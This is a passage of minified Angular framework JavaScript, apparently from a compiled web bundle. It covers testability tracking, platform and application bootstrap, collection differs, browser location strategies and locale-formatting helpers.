foe(t){ty=t}(n),n.addToWindow(i)),this._watchAngularEvents(),e.run(()=>{this.taskTrackingZone="undefined"==typeof Zone?null:Zone.current.get("TaskTrackingZone")})}_watchAngularEvents(){this._ngZone.onUnstable.subscribe({next:()=>{this._didWork=!0,this._isZoneStable=!1}}),this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.subscribe({next:()=>{qi.assertNotInAngularZone(),FD(()=>{this._isZoneStable=!0,this._runCallbacksIfReady()})}})})}increasePendingRequestCount(){return this._pendingCount+=1,this._didWork=!0,this._pendingCount}decreasePendingRequestCount(){if(this._pendingCount-=1,this._pendingCount<0)throw new Error("pending async requests below zero");return this._runCallbacksIfReady(),this._pendingCount}isStable(){return this._isZoneStable&&0===this._pendingCount&&!this._ngZone.hasPendingMacrotasks}_runCallbacksIfReady(){if(this.isStable())FD(()=>{for(;0!==this._callbacks.length;){let e=this._callbacks.pop();clearTimeout(e.timeoutId),e.doneCb(this._didWork)}this._didWork=!1});else{let e=this.getPendingTasks();this._callbacks=this._callbacks.filter(i=>!i.updateCb||!i.updateCb(e)||(clearTimeout(i.timeoutId),!1)),this._didWork=!0}}getPendingTasks(){return this.taskTrackingZone?this.taskTrackingZone.macroTasks.map(e=>({source:e.source,creationLocation:e.creationLocation,data:e.data})):[]}addCallback(e,i,n){let r=-1;i&&i>0&&(r=setTimeout(()=>{this._callbacks=this._callbacks.filter(c=>c.timeoutId!==r),e(this._didWork,this.getPendingTasks())},i)),this._callbacks.push({doneCb:e,timeoutId:r,updateCb:n})}whenStable(e,i,n){if(n&&!this.taskTrackingZone)throw new Error('Task tracking zone is required when passing an update callback to whenStable(). Is "zone.js/plugins/task-tracking" loaded?');this.addCallback(e,i,n),this._runCallbacksIfReady()}getPendingRequestCount(){return this._pendingCount}registerApplication(e){this.registry.registerApplication(e,this)}unregisterApplication(e){this.registry.unregisterApplication(e)}findProviders(e,i,n){return[]}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(UD),At(zv))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),UD=(()=>{class t{constructor(){this._applications=new Map}registerApplication(e,i){this._applications.set(e,i)}unregisterApplication(e){this._applications.delete(e)}unregisterAllApplications(){this._applications.clear()}getTestability(e){return this._applications.get(e)||null}getAllTestabilities(){return Array.from(this._applications.values())}getAllRootElements(){return Array.from(this._applications.keys())}findTestabilityInTree(e,i=!0){var n;return null!==(n=null==ty?void 0:ty.findTestabilityInTree(this,e,i))&&void 0!==n?n:null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})(),ru=null;const R9=new ni("AllowMultipleToken"),qD=new ni("PlatformDestroyListeners");class S9{constructor(a,e){this.name=a,this.token=e}}function P9(t,a,e=[]){const i=`Platform: ${a}`,n=new ni(i);return(r=[])=>{let c=GD();if(!c||c.injector.get(R9,!1)){const d=[...e,...r,{provide:n,useValue:!0}];t?t(d):function goe(t){if(ru&&!ru.get(R9,!1))throw new gi(400,!1);ru=t;const a=t.get(N9);(function k9(t){const a=t.get(A9,null);a&&a.forEach(e=>e())})(t)}(function O9(t=[],a){return Ko.create({name:a,providers:[{provide:dt,useValue:"platform"},{provide:qD,useValue:new Set([()=>ru=null])},...t]})}(d,i))}return function yoe(t){const a=GD();if(!a)throw new gi(401,!1);return a}()}}function GD(){var t;return null!==(t=null==ru?void 0:ru.get(N9))&&void 0!==t?t:null}let N9=(()=>{class t{constructor(e){this._injector=e,this._modules=[],this._destroyListeners=[],this._destroyed=!1}bootstrapModuleFactory(e,i){const n=function z9(t,a){let e;return e="noop"===t?new hoe:("zone.js"===t?void 0:t)||new qi(a),e}(null==i?void 0:i.ngZone,function L9(t){return{enableLongStackTrace:!1,shouldCoalesceEventChangeDetection:!(!t||!t.ngZoneEventCoalescing)||!1,shouldCoalesceRunChangeDetection:!(!t||!t.ngZoneRunCoalescing)||!1}}(i)),r=[{provide:qi,useValue:n}];return n.run(()=>{const c=Ko.create({providers:r,parent:this.injector,name:e.moduleType.name}),d=e.create(c),T=d.injector.get(yh,null);if(!T)throw new gi(402,!1);return n.runOutsideAngular(()=>{const k=n.onError.subscribe({next:q=>{T.handleError(q)}});d.onDestroy(()=>{Wv(this._modules,d),k.unsubscribe()})}),function W9(t,a,e){try{const i=e();return qC(i)?i.catch(n=>{throw a.runOutsideAngular(()=>t.handleError(n)),n}):i}catch(i){throw a.runOutsideAngular(()=>t.handleError(i)),i}}(T,n,()=>{const k=d.injector.get(Lv);return k.runInitializers(),k.donePromise.then(()=>(function lk(t){mr(t,"Expected localeId to be defined"),"string"==typeof t&&(ck=t.toLowerCase().replace(/_/g,"-"))}(d.injector.get(dm,l1)||l1),this._moduleDoBootstrap(d),d))})})}bootstrapModule(e,i=[]){const n=F9({},i);return function poe(t,a,e){const i=new TD(e);return Promise.resolve(i)}(0,0,e).then(r=>this.bootstrapModuleFactory(r,n))}_moduleDoBootstrap(e){const i=e.injector.get(Yf);if(e._bootstrapComponents.length>0)e._bootstrapComponents.forEach(n=>i.bootstrap(n));else{if(!e.instance.ngDoBootstrap)throw new gi(403,!1);e.instance.ngDoBootstrap(i)}this._modules.push(e)}onDestroy(e){this._destroyListeners.push(e)}get injector(){return this._injector}destroy(){if(this._destroyed)throw new gi(404,!1);this._modules.slice().forEach(i=>i.destroy()),this._destroyListeners.forEach(i=>i());const e=this._injector.get(qD,null);e&&(e.forEach(i=>i()),e.clear()),this._destroyed=!0}get destroyed(){return this._destroyed}}return t.\u0275fac=function(e){return new(e||t)(At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})();function F9(t,a){return Array.isArray(a)?a.reduce(F9,t):Object.assign(Object.assign({},t),a)}let Yf=(()=>{class t{constructor(e,i,n){this._zone=e,this._injector=i,this._exceptionHandler=n,this._bootstrapListeners=[],this._views=[],this._runningTick=!1,this._stable=!0,this._destroyed=!1,this._destroyListeners=[],this.componentTypes=[],this.components=[],this._onMicrotaskEmptySubscription=this._zone.onMicrotaskEmpty.subscribe({next:()=>{this._zone.run(()=>{this.tick()})}});const r=new G(d=>{this._stable=this._zone.isStable&&!this._zone.hasPendingMacrotasks&&!this._zone.hasPendingMicrotasks,this._zone.runOutsideAngular(()=>{d.next(this._stable),d.complete()})}),c=new G(d=>{let T;this._zone.runOutsideAngular(()=>{T=this._zone.onStable.subscribe(()=>{qi.assertNotInAngularZone(),FD(()=>{!this._stable&&!this._zone.hasPendingMacrotasks&&!this._zone.hasPendingMicrotasks&&(this._stable=!0,d.next(!0))})})});const k=this._zone.onUnstable.subscribe(()=>{qi.assertInAngularZone(),this._stable&&(this._stable=!1,this._zone.runOutsideAngular(()=>{d.next(!1)}))});return()=>{T.unsubscribe(),k.unsubscribe()}});this.isStable=ra(r,c.pipe(Bd()))}get destroyed(){return this._destroyed}get injector(){return this._injector}bootstrap(e,i){const n=e instanceof Yn;if(!this._injector.get(Lv).done)throw!n&&function zl(t){const a=Un(t)||ur(t)||tn(t);return null!==a&&a.standalone}(e),new gi(405,false);let c;c=n?e:this._injector.get(On).resolveComponentFactory(e),this.componentTypes.push(c.componentType);const d=function _oe(t){return t.isBoundToModule}(c)?void 0:this._injector.get(Z_),k=c.create(Ko.NULL,[],i||c.selector,d),q=k.location.nativeElement,Y=k.injector.get(I9,null);return null==Y||Y.registerApplication(q),k.onDestroy(()=>{this.detachView(k.hostView),Wv(this.components,k),null==Y||Y.unregisterApplication(q)}),this._loadComponent(k),k}tick(){if(this._runningTick)throw new gi(101,!1);try{this._runningTick=!0;for(let e of this._views)e.detectChanges()}catch(e){this._zone.runOutsideAngular(()=>this._exceptionHandler.handleError(e))}finally{this._runningTick=!1}}attachView(e){const i=e;this._views.push(i),i.attachToAppRef(this)}detachView(e){const i=e;Wv(this._views,i),i.detachFromAppRef()}_loadComponent(e){this.attachView(e.hostView),this.tick(),this.components.push(e),this._injector.get(T9,[]).concat(this._bootstrapListeners).forEach(n=>n(e))}ngOnDestroy(){if(!this._destroyed)try{this._destroyListeners.forEach(e=>e()),this._views.slice().forEach(e=>e.destroy()),this._onMicrotaskEmptySubscription.unsubscribe()}finally{this._destroyed=!0,this._views=[],this._bootstrapListeners=[],this._destroyListeners=[]}}onDestroy(e){return this._destroyListeners.push(e),()=>Wv(this._destroyListeners,e)}destroy(){if(this._destroyed)throw new gi(406,!1);const e=this._injector;e.destroy&&!e.destroyed&&e.destroy()}get viewCount(){return this._views.length}warnIfDestroyed(){}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(Ht),At(yh))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Wv(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}let B9=!0,Ma=(()=>{class t{}return t.__NG_ELEMENT_ID__=voe,t})();function voe(t){return function Aoe(t,a,e){if(dl(t)&&!e){const i=hs(t.index,a);return new VC(i,i)}return 47&t.type?new VC(a[16],a):null}(or(),bi(),16==(16&t))}class j9{constructor(){}supports(a){return HC(a)}create(a){return new Ioe(a)}}const woe=(t,a)=>a;class Ioe{constructor(a){this.length=0,this._linkedRecords=null,this._unlinkedRecords=null,this._previousItHead=null,this._itHead=null,this._itTail=null,this._additionsHead=null,this._additionsTail=null,this._movesHead=null,this._movesTail=null,this._removalsHead=null,this._removalsTail=null,this._identityChangesHead=null,this._identityChangesTail=null,this._trackByFn=a||woe}forEachItem(a){let e;for(e=this._itHead;null!==e;e=e._next)a(e)}forEachOperation(a){let e=this._itHead,i=this._removalsHead,n=0,r=null;for(;e||i;){const c=!i||e&&e.currentIndex<$9(i,n,r)?e:i,d=$9(c,n,r),T=c.currentIndex;if(c===i)n--,i=i._nextRemoved;else if(e=e._next,null==c.previousIndex)n++;else{r||(r=[]);const k=d-n,q=T-n;if(k!=q){for(let te=0;te<k;te++){const pe=te<r.length?r[te]:r[te]=0,Re=pe+te;q<=Re&&Re<k&&(r[te]=pe+1)}r[c.previousIndex]=q-k}}d!==T&&a(c,d,T)}}forEachPreviousItem(a){let e;for(e=this._previousItHead;null!==e;e=e._nextPrevious)a(e)}forEachAddedItem(a){let e;for(e=this._additionsHead;null!==e;e=e._nextAdded)a(e)}forEachMovedItem(a){let e;for(e=this._movesHead;null!==e;e=e._nextMoved)a(e)}forEachRemovedItem(a){let e;for(e=this._removalsHead;null!==e;e=e._nextRemoved)a(e)}forEachIdentityChange(a){let e;for(e=this._identityChangesHead;null!==e;e=e._nextIdentityChange)a(e)}diff(a){if(null==a&&(a=[]),!HC(a))throw new gi(900,!1);return this.check(a)?this:null}onDestroy(){}check(a){this._reset();let n,r,c,e=this._itHead,i=!1;if(Array.isArray(a)){this.length=a.length;for(let d=0;d<this.length;d++)r=a[d],c=this._trackByFn(d,r),null!==e&&Object.is(e.trackById,c)?(i&&(e=this._verifyReinsertion(e,r,c,d)),Object.is(e.item,r)||this._addIdentityChange(e,r)):(e=this._mismatch(e,r,c,d),i=!0),e=e._next}else n=0,function die(t,a){if(Array.isArray(t))for(let e=0;e<t.length;e++)a(t[e]);else{const e=t[K_()]();let i;for(;!(i=e.next()).done;)a(i.value)}}(a,d=>{c=this._trackByFn(n,d),null!==e&&Object.is(e.trackById,c)?(i&&(e=this._verifyReinsertion(e,d,c,n)),Object.is(e.item,d)||this._addIdentityChange(e,d)):(e=this._mismatch(e,d,c,n),i=!0),e=e._next,n++}),this.length=n;return this._truncate(e),this.collection=a,this.isDirty}get isDirty(){return null!==this._additionsHead||null!==this._movesHead||null!==this._removalsHead||null!==this._identityChangesHead}_reset(){if(this.isDirty){let a;for(a=this._previousItHead=this._itHead;null!==a;a=a._next)a._nextPrevious=a._next;for(a=this._additionsHead;null!==a;a=a._nextAdded)a.previousIndex=a.currentIndex;for(this._additionsHead=this._additionsTail=null,a=this._movesHead;null!==a;a=a._nextMoved)a.previousIndex=a.currentIndex;this._movesHead=this._movesTail=null,this._removalsHead=this._removalsTail=null,this._identityChangesHead=this._identityChangesTail=null}}_mismatch(a,e,i,n){let r;return null===a?r=this._itTail:(r=a._prev,this._remove(a)),null!==(a=null===this._unlinkedRecords?null:this._unlinkedRecords.get(i,null))?(Object.is(a.item,e)||this._addIdentityChange(a,e),this._reinsertAfter(a,r,n)):null!==(a=null===this._linkedRecords?null:this._linkedRecords.get(i,n))?(Object.is(a.item,e)||this._addIdentityChange(a,e),this._moveAfter(a,r,n)):a=this._addAfter(new Roe(e,i),r,n),a}_verifyReinsertion(a,e,i,n){let r=null===this._unlinkedRecords?null:this._unlinkedRecords.get(i,null);return null!==r?a=this._reinsertAfter(r,a._prev,n):a.currentIndex!=n&&(a.currentIndex=n,this._addToMoves(a,n)),a}_truncate(a){for(;null!==a;){const e=a._next;this._addToRemovals(this._unlink(a)),a=e}null!==this._unlinkedRecords&&this._unlinkedRecords.clear(),null!==this._additionsTail&&(this._additionsTail._nextAdded=null),null!==this._movesTail&&(this._movesTail._nextMoved=null),null!==this._itTail&&(this._itTail._next=null),null!==this._removalsTail&&(this._removalsTail._nextRemoved=null),null!==this._identityChangesTail&&(this._identityChangesTail._nextIdentityChange=null)}_reinsertAfter(a,e,i){null!==this._unlinkedRecords&&this._unlinkedRecords.remove(a);const n=a._prevRemoved,r=a._nextRemoved;return null===n?this._removalsHead=r:n._nextRemoved=r,null===r?this._removalsTail=n:r._prevRemoved=n,this._insertAfter(a,e,i),this._addToMoves(a,i),a}_moveAfter(a,e,i){return this._unlink(a),this._insertAfter(a,e,i),this._addToMoves(a,i),a}_addAfter(a,e,i){return this._insertAfter(a,e,i),this._additionsTail=null===this._additionsTail?this._additionsHead=a:this._additionsTail._nextAdded=a,a}_insertAfter(a,e,i){const n=null===e?this._itHead:e._next;return a._next=n,a._prev=e,null===n?this._itTail=a:n._prev=a,null===e?this._itHead=a:e._next=a,null===this._linkedRecords&&(this._linkedRecords=new Q9),this._linkedRecords.put(a),a.currentIndex=i,a}_remove(a){return this._addToRemovals(this._unlink(a))}_unlink(a){null!==this._linkedRecords&&this._linkedRecords.remove(a);const e=a._prev,i=a._next;return null===e?this._itHead=i:e._next=i,null===i?this._itTail=e:i._prev=e,a}_addToMoves(a,e){return a.previousIndex===e||(this._movesTail=null===this._movesTail?this._movesHead=a:this._movesTail._nextMoved=a),a}_addToRemovals(a){return null===this._unlinkedRecords&&(this._unlinkedRecords=new Q9),this._unlinkedRecords.put(a),a.currentIndex=null,a._nextRemoved=null,null===this._removalsTail?(this._removalsTail=this._removalsHead=a,a._prevRemoved=null):(a._prevRemoved=this._removalsTail,this._removalsTail=this._removalsTail._nextRemoved=a),a}_addIdentityChange(a,e){return a.item=e,this._identityChangesTail=null===this._identityChangesTail?this._identityChangesHead=a:this._identityChangesTail._nextIdentityChange=a,a}}class Roe{constructor(a,e){this.item=a,this.trackById=e,this.currentIndex=null,this.previousIndex=null,this._nextPrevious=null,this._prev=null,this._next=null,this._prevDup=null,this._nextDup=null,this._prevRemoved=null,this._nextRemoved=null,this._nextAdded=null,this._nextMoved=null,this._nextIdentityChange=null}}class Soe{constructor(){this._head=null,this._tail=null}add(a){null===this._head?(this._head=this._tail=a,a._nextDup=null,a._prevDup=null):(this._tail._nextDup=a,a._prevDup=this._tail,a._nextDup=null,this._tail=a)}get(a,e){let i;for(i=this._head;null!==i;i=i._nextDup)if((null===e||e<=i.currentIndex)&&Object.is(i.trackById,a))return i;return null}remove(a){const e=a._prevDup,i=a._nextDup;return null===e?this._head=i:e._nextDup=i,null===i?this._tail=e:i._prevDup=e,null===this._head}}class Q9{constructor(){this.map=new Map}put(a){const e=a.trackById;let i=this.map.get(e);i||(i=new Soe,this.map.set(e,i)),i.add(a)}get(a,e){const n=this.map.get(a);return n?n.get(a,e):null}remove(a){const e=a.trackById;return this.map.get(e).remove(a)&&this.map.delete(e),a}get isEmpty(){return 0===this.map.size}clear(){this.map.clear()}}function $9(t,a,e){const i=t.previousIndex;if(null===i)return i;let n=0;return e&&i<e.length&&(n=e[i]),i+a+n}class K9{constructor(){}supports(a){return a instanceof Map||uD(a)}create(){return new koe}}class koe{constructor(){this._records=new Map,this._mapHead=null,this._appendAfter=null,this._previousMapHead=null,this._changesHead=null,this._changesTail=null,this._additionsHead=null,this._additionsTail=null,this._removalsHead=null,this._removalsTail=null}get isDirty(){return null!==this._additionsHead||null!==this._changesHead||null!==this._removalsHead}forEachItem(a){let e;for(e=this._mapHead;null!==e;e=e._next)a(e)}forEachPreviousItem(a){let e;for(e=this._previousMapHead;null!==e;e=e._nextPrevious)a(e)}forEachChangedItem(a){let e;for(e=this._changesHead;null!==e;e=e._nextChanged)a(e)}forEachAddedItem(a){let e;for(e=this._additionsHead;null!==e;e=e._nextAdded)a(e)}forEachRemovedItem(a){let e;for(e=this._removalsHead;null!==e;e=e._nextRemoved)a(e)}diff(a){if(a){if(!(a instanceof Map||uD(a)))throw new gi(900,!1)}else a=new Map;return this.check(a)?this:null}onDestroy(){}check(a){this._reset();let e=this._mapHead;if(this._appendAfter=null,this._forEach(a,(i,n)=>{if(e&&e.key===n)this._maybeAddToChanges(e,i),this._appendAfter=e,e=e._next;else{const r=this._getOrCreateRecordForKey(n,i);e=this._insertBeforeOrAppend(e,r)}}),e){e._prev&&(e._prev._next=null),this._removalsHead=e;for(let i=e;null!==i;i=i._nextRemoved)i===this._mapHead&&(this._mapHead=null),this._records.delete(i.key),i._nextRemoved=i._next,i.previousValue=i.currentValue,i.currentValue=null,i._prev=null,i._next=null}return this._changesTail&&(this._changesTail._nextChanged=null),this._additionsTail&&(this._additionsTail._nextAdded=null),this.isDirty}_insertBeforeOrAppend(a,e){if(a){const i=a._prev;return e._next=a,e._prev=i,a._prev=e,i&&(i._next=e),a===this._mapHead&&(this._mapHead=e),this._appendAfter=a,a}return this._appendAfter?(this._appendAfter._next=e,e._prev=this._appendAfter):this._mapHead=e,this._appendAfter=e,null}_getOrCreateRecordForKey(a,e){if(this._records.has(a)){const n=this._records.get(a);this._maybeAddToChanges(n,e);const r=n._prev,c=n._next;return r&&(r._next=c),c&&(c._prev=r),n._next=null,n._prev=null,n}const i=new Poe(a);return this._records.set(a,i),i.currentValue=e,this._addToAdditions(i),i}_reset(){if(this.isDirty){let a;for(this._previousMapHead=this._mapHead,a=this._previousMapHead;null!==a;a=a._next)a._nextPrevious=a._next;for(a=this._changesHead;null!==a;a=a._nextChanged)a.previousValue=a.currentValue;for(a=this._additionsHead;null!=a;a=a._nextAdded)a.previousValue=a.currentValue;this._changesHead=this._changesTail=null,this._additionsHead=this._additionsTail=null,this._removalsHead=null}}_maybeAddToChanges(a,e){Object.is(e,a.currentValue)||(a.previousValue=a.currentValue,a.currentValue=e,this._addToChanges(a))}_addToAdditions(a){null===this._additionsHead?this._additionsHead=this._additionsTail=a:(this._additionsTail._nextAdded=a,this._additionsTail=a)}_addToChanges(a){null===this._changesHead?this._changesHead=this._changesTail=a:(this._changesTail._nextChanged=a,this._changesTail=a)}_forEach(a,e){a instanceof Map?a.forEach(e):Object.keys(a).forEach(i=>e(a[i],i))}}class Poe{constructor(a){this.key=a,this.previousValue=null,this.currentValue=null,this._nextPrevious=null,this._next=null,this._prev=null,this._nextAdded=null,this._nextRemoved=null,this._nextChanged=null}}function X9(){return new yd([new j9])}let yd=(()=>{class t{constructor(e){this.factories=e}static create(e,i){if(null!=i){const n=i.factories.slice();e=e.concat(n)}return new t(e)}static extend(e){return{provide:t,useFactory:i=>t.create(e,i||X9()),deps:[[t,new Vc,new Cc]]}}find(e){const i=this.factories.find(n=>n.supports(e));if(null!=i)return i;throw new gi(901,!1)}}return t.\u0275prov=hi({token:t,providedIn:"root",factory:X9}),t})();function Y9(){return new f1([new K9])}let f1=(()=>{class t{constructor(e){this.factories=e}static create(e,i){if(i){const n=i.factories.slice();e=e.concat(n)}return new t(e)}static extend(e){return{provide:t,useFactory:i=>t.create(e,i||Y9()),deps:[[t,new Vc,new Cc]]}}find(e){const i=this.factories.find(n=>n.supports(e));if(i)return i;throw new gi(901,!1)}}return t.\u0275prov=hi({token:t,providedIn:"root",factory:Y9}),t})();const Loe=P9(null,"core",[]);let zoe=(()=>{class t{constructor(e){}}return t.\u0275fac=function(e){return new(e||t)(At(Yf))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function Eh(t){return"boolean"==typeof t?t:null!=t&&"false"!==t}let Bv=null;function su(){return Bv}const ga=new ni("DocumentToken");let XD=(()=>{class t{historyGo(e){throw new Error("Not implemented")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return function Boe(){return At(J9)}()},providedIn:"platform"}),t})();const Hoe=new ni("Location Initialized");let J9=(()=>{class t extends XD{constructor(e){super(),this._doc=e,this._init()}_init(){this.location=window.location,this._history=window.history}getBaseHrefFromDOM(){return su().getBaseHref(this._doc)}onPopState(e){const i=su().getGlobalEventTarget(this._doc,"window");return i.addEventListener("popstate",e,!1),()=>i.removeEventListener("popstate",e)}onHashChange(e){const i=su().getGlobalEventTarget(this._doc,"window");return i.addEventListener("hashchange",e,!1),()=>i.removeEventListener("hashchange",e)}get href(){return this.location.href}get protocol(){return this.location.protocol}get hostname(){return this.location.hostname}get port(){return this.location.port}get pathname(){return this.location.pathname}get search(){return this.location.search}get hash(){return this.location.hash}set pathname(e){this.location.pathname=e}pushState(e,i,n){Z9()?this._history.pushState(e,i,n):this.location.hash=n}replaceState(e,i,n){Z9()?this._history.replaceState(e,i,n):this.location.hash=n}forward(){this._history.forward()}back(){this._history.back()}historyGo(e=0){this._history.go(e)}getState(){return this._history.state}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(){return function Uoe(){return new J9(At(ga))}()},providedIn:"platform"}),t})();function Z9(){return!!window.history.pushState}function YD(t,a){if(0==t.length)return a;if(0==a.length)return t;let e=0;return t.endsWith("/")&&e++,a.startsWith("/")&&e++,2==e?t+a.substring(1):1==e?t+a:t+"/"+a}function eP(t){const a=t.match(/#|\?|$/),e=a&&a.index||t.length;return t.slice(0,e-("/"===t[e-1]?1:0))+t.slice(e)}function Dh(t){return t&&"?"!==t[0]?"?"+t:t}let tg=(()=>{class t{historyGo(e){throw new Error("Not implemented")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return Po(iP)},providedIn:"root"}),t})();const tP=new ni("appBaseHref");let iP=(()=>{class t extends tg{constructor(e,i){var n,r,c;super(),this._platformLocation=e,this._removeListenerFns=[],this._baseHref=null!==(c=null!==(n=null!=i?i:this._platformLocation.getBaseHrefFromDOM())&&void 0!==n?n:null===(r=Po(ga).location)||void 0===r?void 0:r.origin)&&void 0!==c?c:""}ngOnDestroy(){for(;this._removeListenerFns.length;)this._removeListenerFns.pop()()}onPopState(e){this._removeListenerFns.push(this._platformLocation.onPopState(e),this._platformLocation.onHashChange(e))}getBaseHref(){return this._baseHref}prepareExternalUrl(e){return YD(this._baseHref,e)}path(e=!1){const i=this._platformLocation.pathname+Dh(this._platformLocation.search),n=this._platformLocation.hash;return n&&e?`${i}${n}`:i}pushState(e,i,n,r){const c=this.prepareExternalUrl(n+Dh(r));this._platformLocation.pushState(e,i,c)}replaceState(e,i,n,r){const c=this.prepareExternalUrl(n+Dh(r));this._platformLocation.replaceState(e,i,c)}forward(){this._platformLocation.forward()}back(){this._platformLocation.back()}getState(){return this._platformLocation.getState()}historyGo(e=0){var i,n;null===(n=(i=this._platformLocation).historyGo)||void 0===n||n.call(i,e)}}return t.\u0275fac=function(e){return new(e||t)(At(XD),At(tP,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),qoe=(()=>{class t extends tg{constructor(e,i){super(),this._platformLocation=e,this._baseHref="",this._removeListenerFns=[],null!=i&&(this._baseHref=i)}ngOnDestroy(){for(;this._removeListenerFns.length;)this._removeListenerFns.pop()()}onPopState(e){this._removeListenerFns.push(this._platformLocation.onPopState(e),this._platformLocation.onHashChange(e))}getBaseHref(){return this._baseHref}path(e=!1){let i=this._platformLocation.hash;return null==i&&(i="#"),i.length>0?i.substring(1):i}prepareExternalUrl(e){const i=YD(this._baseHref,e);return i.length>0?"#"+i:i}pushState(e,i,n,r){let c=this.prepareExternalUrl(n+Dh(r));0==c.length&&(c=this._platformLocation.pathname),this._platformLocation.pushState(e,i,c)}replaceState(e,i,n,r){let c=this.prepareExternalUrl(n+Dh(r));0==c.length&&(c=this._platformLocation.pathname),this._platformLocation.replaceState(e,i,c)}forward(){this._platformLocation.forward()}back(){this._platformLocation.back()}getState(){return this._platformLocation.getState()}historyGo(e=0){var i,n;null===(n=(i=this._platformLocation).historyGo)||void 0===n||n.call(i,e)}}return t.\u0275fac=function(e){return new(e||t)(At(XD),At(tP,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),iy=(()=>{class t{constructor(e){this._subject=new Tt,this._urlChangeListeners=[],this._urlChangeSubscription=null,this._locationStrategy=e;const i=this._locationStrategy.getBaseHref();this._baseHref=eP(aP(i)),this._locationStrategy.onPopState(n=>{this._subject.emit({url:this.path(!0),pop:!0,state:n.state,type:n.type})})}ngOnDestroy(){var e;null===(e=this._urlChangeSubscription)||void 0===e||e.unsubscribe(),this._urlChangeListeners=[]}path(e=!1){return this.normalize(this._locationStrategy.path(e))}getState(){return this._locationStrategy.getState()}isCurrentPathEqualTo(e,i=""){return this.path()==this.normalize(e+Dh(i))}normalize(e){return t.stripTrailingSlash(function joe(t,a){return t&&a.startsWith(t)?a.substring(t.length):a}(this._baseHref,aP(e)))}prepareExternalUrl(e){return e&&"/"!==e[0]&&(e="/"+e),this._locationStrategy.prepareExternalUrl(e)}go(e,i="",n=null){this._locationStrategy.pushState(n,"",e,i),this._notifyUrlChangeListeners(this.prepareExternalUrl(e+Dh(i)),n)}replaceState(e,i="",n=null){this._locationStrategy.replaceState(n,"",e,i),this._notifyUrlChangeListeners(this.prepareExternalUrl(e+Dh(i)),n)}forward(){this._locationStrategy.forward()}back(){this._locationStrategy.back()}historyGo(e=0){var i,n;null===(n=(i=this._locationStrategy).historyGo)||void 0===n||n.call(i,e)}onUrlChange(e){return this._urlChangeListeners.push(e),this._urlChangeSubscription||(this._urlChangeSubscription=this.subscribe(i=>{this._notifyUrlChangeListeners(i.url,i.state)})),()=>{var i;const n=this._urlChangeListeners.indexOf(e);this._urlChangeListeners.splice(n,1),0===this._urlChangeListeners.length&&(null===(i=this._urlChangeSubscription)||void 0===i||i.unsubscribe(),this._urlChangeSubscription=null)}}_notifyUrlChangeListeners(e="",i){this._urlChangeListeners.forEach(n=>n(e,i))}subscribe(e,i,n){return this._subject.subscribe({next:e,error:i,complete:n})}}return t.normalizeQueryParams=Dh,t.joinWithSlash=YD,t.stripTrailingSlash=eP,t.\u0275fac=function(e){return new(e||t)(At(tg))},t.\u0275prov=hi({token:t,factory:function(){return function Goe(){return new iy(At(tg))}()},providedIn:"root"}),t})();function aP(t){return t.replace(/\/index.html$/,"")}var Al=(()=>((Al=Al||{})[Al.Decimal=0]="Decimal",Al[Al.Percent=1]="Percent",Al[Al.Currency=2]="Currency",Al[Al.Scientific=3]="Scientific",Al))(),Zr=(()=>((Zr=Zr||{})[Zr.Format=0]="Format",Zr[Zr.Standalone=1]="Standalone",Zr))(),Zn=(()=>((Zn=Zn||{})[Zn.Narrow=0]="Narrow",Zn[Zn.Abbreviated=1]="Abbreviated",Zn[Zn.Wide=2]="Wide",Zn[Zn.Short=3]="Short",Zn))(),Pr=(()=>((Pr=Pr||{})[Pr.Short=0]="Short",Pr[Pr.Medium=1]="Medium",Pr[Pr.Long=2]="Long",Pr[Pr.Full=3]="Full",Pr))(),Ba=(()=>((Ba=Ba||{})[Ba.Decimal=0]="Decimal",Ba[Ba.Group=1]="Group",Ba[Ba.List=2]="List",Ba[Ba.PercentSign=3]="PercentSign",Ba[Ba.PlusSign=4]="PlusSign",Ba[Ba.MinusSign=5]="MinusSign",Ba[Ba.Exponential=6]="Exponential",Ba[Ba.SuperscriptingExponent=7]="SuperscriptingExponent",Ba[Ba.PerMille=8]="PerMille",Ba[Ba.Infinity=9]="Infinity",Ba[Ba.NaN=10]="NaN",Ba[Ba.TimeSeparator=11]="TimeSeparator",Ba[Ba.CurrencyDecimal=12]="CurrencyDecimal",Ba[Ba.CurrencyGroup=13]="CurrencyGroup",Ba))();function Hv(t,a){return Md(Xc(t)[Ji.DateFormat],a)}function Uv(t,a){return Md(Xc(t)[Ji.TimeFormat],a)}function qv(t,a){return Md(Xc(t)[Ji.DateTimeFormat],a)}function bd(t,a){const e=Xc(t),i=e[Ji.NumberSymbols][a];if(void 0===i){if(a===Ba.CurrencyDecimal)return e[Ji.NumberSymbols][Ba.Decimal];if(a===Ba.CurrencyGroup)return e[Ji.NumberSymbols][Ba.Group]}return i}function oP(t){if(!t[Ji.ExtraData])throw new Error(`Missing extra locale data for the locale "${t[Ji.LocaleId]}". Use "registerLocaleData" to load new data. See the "I18n guide" on angular.io to know more.`)}function Md(t,a){for(let e=a;e>-1;e--)if(void 0!==t[e])return t[e];throw new Error("Locale data API: locale data undefined")}function ZD(t){const[a,e]=t.split(":");return{hours:+a,minutes:+e}}const 